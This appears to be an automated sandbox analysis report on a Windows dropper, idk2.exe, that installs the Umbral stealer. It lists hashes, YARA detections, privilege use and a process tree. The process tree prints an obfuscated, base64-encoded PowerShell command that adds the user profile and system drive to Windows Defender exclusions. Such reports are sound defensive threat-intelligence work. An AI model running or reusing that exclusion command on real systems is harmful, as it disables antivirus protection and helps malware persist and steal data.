Analysis
-
max time kernel
90s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
12-02-2024 02:01
Static task
static1
Behavioral task
behavioral1
Sample
idk2.exe
Resource
win7-20231215-en
General
-
Target
idk2.exe
-
Size
235KB
-
MD5
de1f5092e62d04690fb1d954f8540116
-
SHA1
959c0ee9355335d66fa5939dda6d452be32a8a06
-
SHA256
f36f29328d18f9d764b1a9e1e278750d21164ae1c1a25307d018a8e4e17c7c08
-
SHA512
2f438cffea72ebb9b089bfba476f4606a92667c154b31c2a6c4153a5ea4aa61620571a4db36a7ed5dffd71cd6edc9250157238b0e8b3a5a53fd27952dd3c2fa6
-
SSDEEP
6144:qbjntB9rSX4wXTAOU5Mj1af2FUD8bTc5Niydt8k1Mwce6yoN:qbjn1WowBTbTcLFHd1Mwz6t
Malware Config
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral2/files/0x000e000000023145-4.dat family_umbral behavioral2/memory/2464-11-0x000001B6B68A0000-0x000001B6B68E0000-memory.dmp family_umbral -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation idk2.exe -
Executes dropped EXE 1 IoCs
pid Process 2464 Umbral.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1644 powershell.exe 1644 powershell.exe -
Suspicious use of AdjustPrivilegeToken 44 IoCs
description pid Process Token: SeDebugPrivilege 2464 Umbral.exe Token: SeDebugPrivilege 1644 powershell.exe Token: SeIncreaseQuotaPrivilege 4516 wmic.exe Token: SeSecurityPrivilege 4516 wmic.exe Token: SeTakeOwnershipPrivilege 4516 wmic.exe Token: SeLoadDriverPrivilege 4516 wmic.exe Token: SeSystemProfilePrivilege 4516 wmic.exe Token: SeSystemtimePrivilege 4516 wmic.exe Token: SeProfSingleProcessPrivilege 4516 wmic.exe Token: SeIncBasePriorityPrivilege 4516 wmic.exe Token: SeCreatePagefilePrivilege 4516 wmic.exe Token: SeBackupPrivilege 4516 wmic.exe Token: SeRestorePrivilege 4516 wmic.exe Token: SeShutdownPrivilege 4516 wmic.exe Token: SeDebugPrivilege 4516 wmic.exe Token: SeSystemEnvironmentPrivilege 4516 wmic.exe Token: SeRemoteShutdownPrivilege 4516 wmic.exe Token: SeUndockPrivilege 4516 wmic.exe Token: SeManageVolumePrivilege 4516 wmic.exe Token: 33 4516 wmic.exe Token: 34 4516 wmic.exe Token: 35 4516 wmic.exe Token: 36 4516 wmic.exe Token: SeIncreaseQuotaPrivilege 4516 wmic.exe Token: SeSecurityPrivilege 4516 wmic.exe Token: SeTakeOwnershipPrivilege 4516 wmic.exe Token: SeLoadDriverPrivilege 4516 wmic.exe Token: SeSystemProfilePrivilege 4516 wmic.exe Token: SeSystemtimePrivilege 4516 wmic.exe Token: SeProfSingleProcessPrivilege 4516 wmic.exe Token: SeIncBasePriorityPrivilege 4516 wmic.exe Token: SeCreatePagefilePrivilege 4516 wmic.exe Token: SeBackupPrivilege 4516 wmic.exe Token: SeRestorePrivilege 4516 wmic.exe Token: SeShutdownPrivilege 4516 wmic.exe Token: SeDebugPrivilege 4516 wmic.exe Token: SeSystemEnvironmentPrivilege 4516 wmic.exe Token: SeRemoteShutdownPrivilege 4516 wmic.exe Token: SeUndockPrivilege 4516 wmic.exe Token: SeManageVolumePrivilege 4516 wmic.exe Token: 33 4516 wmic.exe Token: 34 4516 wmic.exe Token: 35 4516 wmic.exe Token: 36 4516 wmic.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 660 wrote to memory of 1644 660 idk2.exe 85 PID 660 wrote to memory of 1644 660 idk2.exe 85 PID 660 wrote to memory of 1644 660 idk2.exe 85 PID 660 wrote to memory of 2464 660 idk2.exe 87 PID 660 wrote to memory of 2464 660 idk2.exe 87 PID 2464 wrote to memory of 4516 2464 Umbral.exe 97 PID 2464 wrote to memory of 4516 2464 Umbral.exe 97
Processes
-
C:\Users\Admin\AppData\Local\Temp\idk2.exe"C:\Users\Admin\AppData\Local\Temp\idk2.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:660 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcABnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcAZABxACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AcgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAZgBpACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1644
-
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2464 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4516
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
230KB
MD5c8b5184d9b887d92ab00e72ecb7ec278
SHA1eb54b2c391556183c63877a988df43633961aa87
SHA256e1c82e170147a3acbb3fb9cc57bea7d25e0ce2d9c570994ac5a027819c9d5b9f
SHA5122c2a52c97579efc2df50063bb80280de04fb3e52b1cf20b089f71cb1746e66867dfbbf44e2357c1ce20e3b10b933da4b811cae34052ac4ce95d90419a45e38a9
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82